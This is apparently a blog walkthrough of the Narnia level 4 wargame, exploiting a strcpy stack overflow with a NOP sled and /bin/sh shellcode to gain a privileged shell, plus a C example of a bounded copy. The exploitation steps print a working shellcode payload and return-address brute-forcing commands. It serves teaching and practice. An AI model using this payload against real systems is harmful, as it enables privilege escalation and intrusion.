Buffer Overflow again - Brute Forcing your way in!

22 Sep 2018

This article is about how a bigger buffer can be overflowed and a return address supplied so as to get administrative privileges. The method is very similar to this post here. Let's jump straight into practice! SSH into narnia4 with the password obtained from here.

  • Snap of /narnia/narnia4.c
  • What is the vulnerability?
  • The command-line argument is copied into the buffer variable with strcpy, which performs no length check:

            strcpy(buffer, argv[1]);

    Overflowing the buffer variable overwrites the saved return address of main. A NOP sled lets the return address be pointed at any address within the buffer, so that execution slides into the shell-code payload.
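As an added illustration (not the narnia4 source), here is the unchecked argv[1] copy from the snippet above next to a bounded version that rejects any argument that does not fit; BUF_SIZE is an assumed size for the example:

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size for this example, not taken from narnia4.c. */
#define BUF_SIZE 256

/* Unbounded copy, as on the page: an argument of BUF_SIZE bytes or more
 * writes past the end of dst, over the saved frame and return address. */
void copy_arg_unchecked(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* Hardened form: copy only if src plus its NUL fits in cap bytes.
 * Returns 0 on success, -1 if the argument was rejected (dst left empty). */
int copy_arg_checked(char *dst, size_t cap, const char *src)
{
    size_t n = strlen(src);
    if (cap == 0)
        return -1;
    if (n >= cap) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* 1 if strcpy of arg into a BUF_SIZE byte stack buffer would overflow. */
int would_overflow(const char *arg)
{
    return strlen(arg) >= BUF_SIZE;
}

int main(int argc, char **argv)
{
    char buffer[BUF_SIZE];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <arg>\n", argv[0]);
        return 1;
    }
    if (copy_arg_checked(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    printf("copied %zu bytes\n", strlen(buffer));
    return 0;
}
```

Run with a 268-byte argument, the length the walkthrough below arrives at, and the checked version refuses it instead of corrupting the stack.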

  • Exploitation Steps:
    1. Go to the /narnia folder. Enter gdb ./narnia4 and disassemble the main function with "(gdb) disas main".
    2. Snap:
    3. You can see the line "sub $0x104,%esp", which reserves 260 bytes on the stack by subtracting 0x104 from the stack pointer.
    4. Run gdb --args ./narnia4 $(python -c 'print "\x41"*260') and do "(gdb) run", then slowly increase from 260 until the return address reported in the segmentation fault is overwritten with "\x41\x41\x41\x41". I reached this point at 268.
    5. So, taking the payload as the same shell-code used in Narnia Level 2, 34 bytes of shell-code + 4 bytes of return address leaves 230 bytes for the NOP sled. Send this as the argument through GDB to choose an appropriate return address:
    6.
                gdb --args /narnia/narnia4 $(python -c 'print "\x90"*230+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x00\x00\x00\x00"')
                (gdb) run
                (gdb) x/250x $esp
                (gdb) quit

      Snap:
    7. In the above snap, I chose the return address 0xffffd801. Now run narnia4 with this return address in place of the four zero bytes.
    8. Snap:
    9. A shell is opened with the elevated privileges of narnia5, as can be seen above, and you can cat the password for Level 5!

  • Behind the scenes explanation:
  • It is the same as Narnia Level 2. You are merely brute-forcing the offset here to overwrite the return address of the main function with your desired return address and run the shell-code. The shell is opened with elevated privileges and you get your password!